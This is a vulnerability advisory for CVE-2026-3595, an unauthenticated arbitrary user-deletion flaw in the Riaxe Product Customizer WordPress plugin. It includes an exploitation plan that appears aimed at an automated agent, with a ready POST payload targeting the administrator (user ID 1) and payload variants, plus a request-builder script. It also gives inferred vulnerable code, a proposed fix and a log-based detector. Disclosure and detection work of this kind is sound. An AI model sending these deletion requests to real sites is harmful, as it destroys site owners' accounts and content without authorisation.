CVE-2026-3595

Riaxe Product Customizer <= 2.1.2 - Unauthenticated Arbitrary User Deletion via 'user_id' Parameter

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The Riaxe Product Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.2. This is due to the plugin registering a REST API route at POST /wp-json/InkXEProductDesignerLite/customer/delete_customer without a permission_callback, causing WordPress to default to allowing unauthenticated access, and the inkxe_delete_customer() callback function taking an array of user IDs from the request body and passing each one directly to wp_delete_user() without any authentication or authorization checks. This makes it possible for unauthenticated attackers to delete arbitrary WordPress user accounts, including administrator accounts, leading to complete site lockout and data loss.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Note that the vector scores the deletion as a low integrity impact only (I:L, A:N), so the 5.3 score does not reflect the administrator lockout and content loss described above; triage on the description rather than the number.

Technical Details

Affected versions: <= 2.1.2
Published: April 15, 2026
Last updated: April 16, 2026

Research Plan
Status: Unverified


This research plan outlines the steps to exploit CVE-2026-3595, an unauthenticated arbitrary user deletion vulnerability in the Riaxe Product Customizer plugin.


1. Vulnerability Summary

The Riaxe Product Customizer plugin for WordPress (versions up to 2.1.2) registers a REST API route POST /wp-json/InkXEProductDesignerLite/customer/delete_customer without providing a permission_callback. When a route is registered without one, WordPress core (since 5.5) emits a _doing_it_wrong notice but still treats the route as public, so unauthenticated users can reach it. The callback function associated with this route, inkxe_delete_customer(), accepts an array of user IDs from the request body and passes them directly to the core WordPress function wp_delete_user() without any identity verification or capability checks.

2. Attack Vector Analysis

  • Endpoint: POST /wp-json/InkXEProductDesignerLite/customer/delete_customer
  • Namespace/Route: InkXEProductDesignerLite/customer/delete_customer
  • Method: POST
  • Vulnerable Parameter: user_id (expected as an array/list of integers)
  • Authentication: None required (Unauthenticated).
  • Preconditions: The plugin must be active. The attacker needs to know or guess the ID of the user they wish to delete (e.g., ID 1 is almost always the initial administrator).

3. Code Flow (Inferred)

  1. Route Registration: The plugin uses the rest_api_init hook to register the route.
    // Inferred registration logic
    register_rest_route('InkXEProductDesignerLite', '/customer/delete_customer', array(
        'methods' => 'POST',
        'callback' => 'inkxe_delete_customer',
        // Missing 'permission_callback'
    ));
    
  2. Request Handling: When a POST request is sent to the endpoint, WordPress dispatches it to inkxe_delete_customer($request).
  3. Vulnerable Callback:
    // wp_delete_user() is defined in wp-admin/includes/user.php, which is not
    // loaded on REST requests, so the plugin presumably require_once()s it itself.
    function inkxe_delete_customer($request) {
        $params = $request->get_json_params(); // or get_params(), which also covers form-encoded bodies
        $user_ids = $params['user_id'];
        // Logic likely iterates through $user_ids and calls:
        foreach ($user_ids as $id) {
            wp_delete_user($id);
        }
        // Response shape is not known from the advisory.
        return rest_ensure_response(null);
    }
    
  4. Sink: wp_delete_user() executes, removing the user from the database.

4. Nonce Acquisition Strategy

The endpoint lacks a permission_callback, so it is publicly accessible. WordPress only enforces the REST nonce (_wpnonce or X-WP-Nonce) when a request carries logged-in cookies; a request with no cookies skips cookie authentication entirely and is processed as an anonymous user, so no nonce is needed for this attack unless the site has added a global restriction (for example a plugin that forces authentication on every REST route).

Strategy:

  1. Send the request with no cookies and no nonce. This is the attacker's position and is the expected path.
  2. A 403 Forbidden with a "rest_cookie_invalid_nonce" error can only occur if the client is sending WordPress logged-in cookies together with a missing or stale nonce. Either drop the cookies, or have the agent obtain a REST nonce:
    • Action String: wp_rest
    • Acquisition Method:
      1. Navigate to the site's homepage or any public page.
      2. Use browser_eval to check if a nonce is localized. Common keys: window.wpApiSettings.nonce.
      3. Alternatively, check the HTML source for _wpnonce in scripts.

5. Exploitation Strategy

The goal is to delete a specific user (e.g., the primary administrator with ID 1).

  • Target URL: http://<target-site>/wp-json/InkXEProductDesignerLite/customer/delete_customer
  • HTTP Method: POST
  • Content-Type: application/json
  • Payload:
    {
        "user_id": [1]
    }
    

Step-by-step Plan:

  1. Discovery: Verify the route is registered by sending a GET request to /wp-json/InkXEProductDesignerLite; the namespace index lists every route in the namespace together with its methods. Alternatively, GET /wp-json/ and check the "namespaces" array for InkXEProductDesignerLite. Note that /wp-json/InkXEProductDesignerLite/customer/ is not itself a route and returns a rest_no_route 404 even when the plugin is active, so do not use it as the test. A 404 on the namespace index means the plugin is not active or the namespace differs.
  2. Execution: Use the http_request tool to send the POST payload.
  3. Cleanup: No cleanup is possible as the user is deleted.
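The discovery and request-construction steps above, as an added Python example that is not code from the advisory, the plugin or its vendor. It assumes the WordPress REST namespace index format (GET /wp-json/<namespace> returns a JSON object whose "routes" map lists each registered route with its methods), uses only the standard library, and embeds a constructed sample index and a constructed rest_no_route error body. check_site() only reads the namespace index and never calls the delete route; build_delete_request() assembles the POST the plan describes without sending it.

```python
"""Discovery and request construction for the CVE-2026-3595 endpoint.

Added example; not code from the advisory, the plugin or its vendor.
Assumes the WordPress REST namespace index format and uses only the
standard library.
"""
import json
import urllib.error
import urllib.request

NAMESPACE = "InkXEProductDesignerLite"
ROUTE = f"/{NAMESPACE}/customer/delete_customer"

# Constructed sample of GET /wp-json/InkXEProductDesignerLite with the plugin
# active. The outer shape (namespace + routes map with "methods") follows
# WordPress core's namespace index; the per-route "args" content is assumed.
SAMPLE_INDEX = json.dumps({
    "namespace": NAMESPACE,
    "routes": {
        f"/{NAMESPACE}": {"namespace": NAMESPACE, "methods": ["GET"]},
        ROUTE: {
            "namespace": NAMESPACE,
            "methods": ["POST"],
            "endpoints": [{"methods": ["POST"], "args": {}}],
        },
    },
})

# What core returns for an unknown namespace (plugin inactive): a rest_no_route
# error with no "routes" key. Constructed sample.
SAMPLE_NO_ROUTE = json.dumps({
    "code": "rest_no_route",
    "message": "No route was found matching the URL and request method.",
    "data": {"status": 404},
})


def route_is_exposed(index_json: str) -> bool:
    """True when the namespace index lists the delete_customer route and it
    accepts POST. Error bodies and non-JSON both yield False."""
    try:
        index = json.loads(index_json)
    except json.JSONDecodeError:
        return False
    if not isinstance(index, dict):
        return False
    entry = (index.get("routes") or {}).get(ROUTE)
    if not isinstance(entry, dict):
        return False
    return "POST" in {m.upper() for m in entry.get("methods", [])}


def build_delete_request(base_url: str, user_ids) -> urllib.request.Request:
    """Build, but do not send, the POST the research plan describes: a JSON
    body with "user_id" as an array of integers, no cookies and no nonce."""
    body = json.dumps({"user_id": [int(uid) for uid in user_ids]}).encode("utf-8")
    return urllib.request.Request(
        base_url.rstrip("/") + "/wp-json" + ROUTE,
        data=body,
        method="POST",
        headers={"Content-Type": "application/json", "Accept": "application/json"},
    )


def check_site(base_url: str, timeout: float = 10.0) -> bool:
    """Fetch the live namespace index and report whether the route is exposed.
    Read-only: this never calls the delete endpoint."""
    url = base_url.rstrip("/") + "/wp-json/" + NAMESPACE
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return route_is_exposed(resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as exc:
        # A 404 here carries the rest_no_route body, i.e. namespace not registered.
        return route_is_exposed(exc.read().decode("utf-8", "replace"))
```

check_site("https://shop.example") returning True on a site that is still on 2.1.2 or earlier is the signal to deactivate the plugin, since the page lists it as unpatched; the request builder is kept separate so the discovery step can be run on its own.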

6. Test Data Setup

To safely verify this without locking yourself out:

  1. Create a "Victim" user with Administrator privileges via WP-CLI:
    wp user create victim victim@example.com --role=administrator --user_pass=password123
  2. Note the ID of the created user:
    wp user get victim --field=ID (Let's assume the ID is 2).
  3. The exploit will target user ID 2.

7. Expected Results

  • Successful Exploit: The server returns 200 OK or 204 No Content.
  • Plugin Behavior: On a single-site install, wp_delete_user() removes the user's row from wp_users and its rows from wp_usermeta. Called with no reassign argument, as the inferred code does, it also deletes the user's posts and links rather than reassigning them, so the data loss extends to content. On multisite, wp_delete_user() only strips the user's capabilities for the current site and the wp_users row survives, so the account is removed from the site rather than deleted outright.
  • Site Impact: If an admin is deleted, they can no longer log in.

8. Verification Steps

After sending the HTTP request, verify the deletion using WP-CLI:

  1. Check if the user still exists:
    wp user get 2
  2. Expected output: Error: Invalid user ID, email or login: '2'
  3. Alternatively, list all users to ensure the ID is missing:
    wp user list

9. Alternative Approaches

If a JSON payload fails, the plugin might be expecting standard URL-encoded form data.

  • Alternative Payload (Form-encoded):
    • Method: POST
    • Content-Type: application/x-www-form-urlencoded
    • Body: user_id[]=2
  • Alternative Parameter Structure:
    • Try passing a single integer instead of an array: {"user_id": 2}.
    • Try passing the ID as a string within the array: {"user_id": ["2"]}.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Riaxe Product Customizer plugin registers a REST API endpoint for deleting customers that lacks a 'permission_callback', allowing unauthenticated access. The associated callback function, 'inkxe_delete_customer', accepts an array of user IDs from the request and deletes them via 'wp_delete_user()' without any identity verification. This allows unauthenticated attackers to delete arbitrary users, including administrators, potentially locking legitimate owners out of the site.

Vulnerable Code

// Inferred registration within the plugin's REST API initialization logic
register_rest_route('InkXEProductDesignerLite', '/customer/delete_customer', array(
    'methods' => 'POST',
    'callback' => 'inkxe_delete_customer',
    // Missing 'permission_callback' allows unauthenticated access
));

---

// Inferred callback function handling the deletion
function inkxe_delete_customer($request) {
    $user_ids = $request->get_param('user_id');
    if (is_array($user_ids)) {
        foreach ($user_ids as $id) {
            // Vulnerable sink: deleting users without authorization checks
            wp_delete_user($id);
        }
    }
}

Security Fix

--- a/inc/class-inkxe-rest-api.php
+++ b/inc/class-inkxe-rest-api.php
@@ -10,6 +10,9 @@
     register_rest_route('InkXEProductDesignerLite', '/customer/delete_customer', array(
         'methods' => 'POST',
         'callback' => 'inkxe_delete_customer',
+        'permission_callback' => function () {
+            return current_user_can('delete_users');
+        }
     ));
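Review bot: the permission_callback gates the route on delete_users, which is the right capability (it is what the delete_user meta cap resolves to, and on multisite it is restricted to super admins), but the callback body is untouched by this hunk, so an authorized caller still has no per-ID check and nothing validates that user_id is an array of integers. Suggest adding an 'args' schema to the registration, e.g. `'args' => array('user_id' => array('required' => true, 'type' => 'array', 'items' => array('type' => 'integer')))`, and inside inkxe_delete_customer() checking `current_user_can('delete_user', $id)` and `$id !== get_current_user_id()` before each wp_delete_user() so the endpoint cannot delete the caller's own account. The file path in the header is inferred like the rest of the code on this page, and the plugin is listed as unpatched above, so treat this as a proposed fix rather than a vendor diff.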

Exploit Outline

The exploit targets the public REST API endpoint at /wp-json/InkXEProductDesignerLite/customer/delete_customer. An unauthenticated attacker sends a POST request with a JSON payload containing a 'user_id' parameter, which must be an array of integers representing the target WordPress user IDs (e.g., ID 1 for the primary administrator). Because the endpoint lacks a permission_callback, the request is executed by the server, and the inkxe_delete_customer function iterates through the provided IDs, calling the core wp_delete_user function on each, resulting in permanent account deletion without any credential verification.
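For the defensive side, an added Python example (not from the advisory or the plugin) that flags POSTs to the vulnerable route in web-server access logs. It assumes the Apache/nginx "combined" log format, matches both the pretty-permalink path and WordPress's equivalent ?rest_route= query form (which bypasses a rule that only looks for /wp-json/), and treats a wp-admin Referer as a triage hint only, since that header is attacker-controlled. That the plugin's own admin UI calls this route from wp-admin is an assumption, and the sample log lines are constructed.

```python
"""Access-log detection for POSTs to the vulnerable delete_customer route.

Added example; not code from the advisory or the plugin. Assumes the
Apache/nginx "combined" log format; tune the regex to your own format.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, unquote, urlsplit

ROUTE = "/InkXEProductDesignerLite/customer/delete_customer"

# "combined" format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Apr/2026:10:01:12 +0000] "GET /wp-json/InkXEProductDesignerLite HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [15/Apr/2026:10:01:13 +0000] "POST /wp-json/InkXEProductDesignerLite/customer/delete_customer HTTP/1.1" 200 4 "-" "python-requests/2.31"
198.51.100.4 - - [15/Apr/2026:10:05:40 +0000] "POST /index.php?rest_route=%2FInkXEProductDesignerLite%2Fcustomer%2Fdelete_customer HTTP/1.1" 200 4 "-" "Mozilla/5.0"
192.0.2.9 - - [15/Apr/2026:10:07:02 +0000] "POST /wp-json/InkXEProductDesignerLite/customer/delete_customer HTTP/1.1" 200 4 "https://shop.example/wp-admin/admin.php?page=inkxe" "Mozilla/5.0"
192.0.2.9 - - [15/Apr/2026:10:08:30 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def targets_delete_route(raw_path: str) -> bool:
    """Match the pretty-permalink path and WordPress's ?rest_route= form.
    parse_qs percent-decodes the query value, so %2F-encoded routes match too."""
    parts = urlsplit(raw_path)
    if unquote(parts.path).rstrip("/").endswith("/wp-json" + ROUTE):
        return True
    return any(v.rstrip("/") == ROUTE for v in parse_qs(parts.query).get("rest_route", []))


@dataclass
class Hit:
    ip: str
    ts: str
    status: str
    referer: str
    severity: str


def scan_log(text: str) -> list:
    """Return one Hit per POST to the delete route. A 2xx with no wp-admin
    Referer is the unauthenticated-exploit pattern and is rated high. The
    Referer is attacker-controlled, so "info" hits still need correlating with
    an administrator session; they are not proof of legitimate use."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not targets_delete_route(m["path"]):
            continue
        # Assumption: the plugin's own admin UI calls this route from wp-admin.
        from_admin_ui = "/wp-admin/" in m["referer"]
        severity = "high" if m["status"].startswith("2") and not from_admin_ui else "info"
        hits.append(Hit(m["ip"], m["ts"], m["status"], m["referer"], severity))
    return hits
```

Every hit, whatever its severity, is worth a look while the plugin is unpatched, because a 200 on this route means a deletion went through; pair the hits with a WP-CLI user listing (wp user list) taken before and after the timestamp to see which accounts disappeared.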
